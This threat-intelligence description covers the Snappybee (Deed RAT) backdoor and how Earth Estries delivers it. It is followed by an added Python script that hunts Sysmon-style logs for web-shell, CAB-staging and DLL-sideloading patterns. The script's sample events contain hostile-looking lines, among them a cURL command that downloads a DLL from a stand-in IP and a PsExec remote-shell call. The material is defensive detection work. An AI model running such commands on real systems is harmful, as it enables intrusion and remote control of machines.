Snappybee, also known as Deed RAT, is a modular backdoor that forms part of the toolkit Earth Estries uses to control compromised machines. It is one of four major tools, alongside Cobalt Strike and Zingdoor, that the group relies on to gain control over systems. Like Zingdoor, Snappybee is typically deployed through DLL sideloading, and it is regarded as the successor to ShadowPad, another well-known modular backdoor. The malware has been used in targeted intrusions against a range of victims, including government servers in Southeast Asia.
Snappybee is typically deployed in the later stages of the intrusion, often after other backdoors such as Zingdoor and Cobalt Strike have already been installed, although the order varies. It belongs to one of two distinct infection chains used by Earth Estries. In the first chain, tools such as PsExec, Trillclient, Hemigate, and Crowdoor are delivered as CAB files. In the second chain, malware such as Zingdoor and Snappybee is fetched with cURL, together with utilities such as PortScan and NinjaCopy.
Earth Estries gains initial access by exploiting vulnerable Exchange servers and dropping web shells such as ChinaChopper, then installs additional backdoors including Zingdoor, Snappybee, and Cobalt Strike, illustrating the breadth of its toolkit. Once inside a network, the initial backdoor is used for lateral movement, and further backdoors such as Zingdoor and Snappybee are installed on other machines. This approach gives the group broad and sustained access to the target environment, enabling persistent data theft; Earth Estries' campaigns are espionage-oriented rather than disruptive.
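As an added illustration (not from the original page and not Trend Micro's own detection content), the following Python hunts over constructed Sysmon-style events for the three behaviours described in the two paragraphs above: an IIS worker process spawning a shell (web shell on an Exchange server), CAB extraction followed by execution of a tool from the extraction directory (first chain), and a cURL download of a DLL that is later loaded by an executable in the same directory (second chain, DLL sideloading). Field names are modelled on Sysmon process-creation (EventID 1) and image-load (EventID 7) records; every path, host and file name in the sample is made up, and the heuristics are assumptions chosen for the example rather than indicators from the report.

```python
"""Hunt constructed Sysmon-style events for the Earth Estries delivery
patterns described above.  Added example; all sample data is made up."""
import ntpath
import re

# Constructed sample telemetry in a simple key="value" form.
SAMPLE_EVENTS = [
    # Web shell on Exchange: IIS worker process spawning a shell.
    'EventID="1" Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c whoami" '
    'ParentImage="C:\\Windows\\System32\\inetsrv\\w3wp.exe"',
    # First chain: tools arrive as a CAB, are extracted, then PsExec runs from the drop dir.
    'EventID="1" Image="C:\\Windows\\System32\\expand.exe" '
    'CommandLine="expand.exe C:\\Users\\Public\\t.cab -F:* C:\\Users\\Public\\tools" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID="1" Image="C:\\Users\\Public\\tools\\PsExec.exe" '
    'CommandLine="PsExec.exe \\\\10.0.0.5 -s cmd.exe" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    # Second chain: cURL fetches a DLL that a legitimate exe in the same dir later sideloads.
    'EventID="1" Image="C:\\Windows\\System32\\curl.exe" '
    'CommandLine="curl.exe -o C:\\ProgramData\\upd\\helper.dll http://198.51.100.7/helper.dll" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID="7" Image="C:\\ProgramData\\upd\\legit.exe" '
    'ImageLoaded="C:\\ProgramData\\upd\\helper.dll"',
    # Benign noise that must not fire: curl fetching a text file, a system DLL load.
    'EventID="1" Image="C:\\Windows\\System32\\curl.exe" '
    'CommandLine="curl.exe -o C:\\temp\\notes.txt http://intranet/notes.txt" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID="7" Image="C:\\ProgramData\\upd\\legit.exe" '
    'ImageLoaded="C:\\Windows\\System32\\kernel32.dll"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
SHELLS = {"cmd.exe", "powershell.exe"}
STAGED_EXT = (".dll", ".exe", ".cab")


def parse_event(line):
    """Turn one key="value" line into a dict (values are returned verbatim)."""
    return dict(FIELD_RE.findall(line))


def base(path):
    return ntpath.basename(path).lower()


def lower_dir(path):
    return ntpath.dirname(path).lower()


def hunt(lines):
    """Return a list of finding strings; events are processed in order so that
    a later image-load or process-start can be tied to an earlier download
    or CAB extraction on the same host."""
    findings = []
    downloaded = set()   # lower-cased paths written by "curl -o"
    cab_dirs = set()     # lower-cased destination dirs of expand.exe
    for ev in map(parse_event, lines):
        eid = ev.get("EventID")
        if eid == "1":
            img = ev.get("Image", "")
            cmd = ev.get("CommandLine", "")
            parent = ev.get("ParentImage", "")
            argv = cmd.split()
            # Exchange web shell heuristic: w3wp.exe should not spawn a shell.
            if base(parent) == "w3wp.exe" and base(img) in SHELLS:
                findings.append(f"web shell: w3wp.exe spawned {base(img)}")
            # Second chain, step 1: cURL writing a binary to disk.
            if base(img) == "curl.exe":
                for flag in ("-o", "--output"):
                    if flag in argv[:-1]:
                        out = argv[argv.index(flag) + 1]
                        if out.lower().endswith(STAGED_EXT):
                            downloaded.add(out.lower())
                            findings.append(f"curl download of binary: {out}")
            # First chain, step 1: expand.exe extracting a CAB (destination is last arg).
            if base(img) == "expand.exe" and ".cab" in cmd.lower() and len(argv) > 1:
                cab_dirs.add(argv[-1].lower())
                findings.append(f"CAB extraction to {argv[-1]}")
            # First chain, step 2: something executed from a CAB drop directory.
            if lower_dir(img) in cab_dirs:
                findings.append(f"tool staged from CAB executed: {img}")
        elif eid == "7":
            loaded = ev.get("ImageLoaded", "").lower()
            img = ev.get("Image", "")
            # Second chain, step 2: the downloaded DLL is loaded from the same
            # directory as the loading executable (classic sideloading layout).
            if loaded in downloaded and lower_dir(img) == lower_dir(loaded):
                findings.append(f"cURL-delivered DLL sideloaded: {img} loaded {loaded}")
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

The correlation is deliberately state-based rather than per-event: a cURL download or a CAB extraction on its own is common administrative noise, but a download followed by a same-directory DLL load, or an extraction followed by execution out of the destination, is the sequence the two infection chains share. In a real pipeline the state would be keyed by host and bounded by a time window.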
Description last updated: 2024-11-28T11:52:40.866Z